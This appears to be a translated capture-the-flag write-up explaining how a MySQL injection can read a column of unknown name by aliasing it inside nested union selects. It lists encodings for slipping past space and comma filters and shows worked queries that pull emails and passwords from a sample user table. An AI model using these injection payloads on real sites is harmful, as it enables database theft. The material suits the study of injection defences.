Detailed explanation of how Mysql bypasses unknown field names

This article mainly introduces to you the relevant information on how Mysql can cleverly bypass unknown field names. The article gives detailed sample codes for your reference and study. It has certain reference and learning value for learning mysql. Friends who need it can follow Let's take a look, I hope it can help everyone.

Preface

This article introduces the fifth question of DDCTF, the technique of bypassing unknown field names. Here I use this machine to operate it. The idea is great and clear. I would like to share it with you. Let’s take a look at the detailed introduction:

Implementation ideas

The question filters spaces and commas. Use %0a, %0b, %0c, %0d, %a0 for spaces, or use parentheses directly. It can be bypassed. Use join to bypass the comma;

The field name where the flag is stored is unknown. Information_schema.columns also filters the hex of the table name, that is, the field name cannot be obtained. At this time, you can use a joint query. The process As follows:

The idea is to get the flag and let it appear under the name of the known field;

Sample code:

mysql> select (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| a | b | c | d |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
 
mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
 
mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user;
+---+-------+----------+-------------+
| 1 | 2  | 3  | 4   |
+---+-------+----------+-------------+
| 1 | 2  | 3  | 4   |
| 1 | admin | admin888 | 110@110.com |
| 2 | test | test123 | 119@119.com |
| 3 | cs | cs123 | 120@120.com |
+---+-------+----------+-------------+
4 rows in set (0.01 sec)
 
mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e;
+-------------+
| 4   |
+-------------+
| 4   |
| 110@110.com |
| 119@119.com |
| 120@120.com |
+-------------+
4 rows in set (0.03 sec)
 
mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3;
 
+-------------+
| 4   |
+-------------+
| 120@120.com |
+-------------+
1 row in set (0.01 sec)
 
mysql> select * from user where id=1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d
union select * from user)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i;
+-------------+----------+----------+-------------+
| id   | username | password | email  |
+-------------+----------+----------+-------------+
| 1   | admin | admin888 | 110@110.com |
| 120@120.com | 1  | 1  | 1   |
+-------------+----------+----------+-------------+
2 rows in set (0.04 sec)

Related recommendations:

Detailed explanation of how to enable slow query log in MySQL

Ten principles of basic statement optimization in Mysql

MySQL remote in Linux server Detailed explanation of connection method

The above is the detailed content of Detailed explanation of how Mysql bypasses unknown field names. For more information, please follow other related articles on the PHP Chinese website!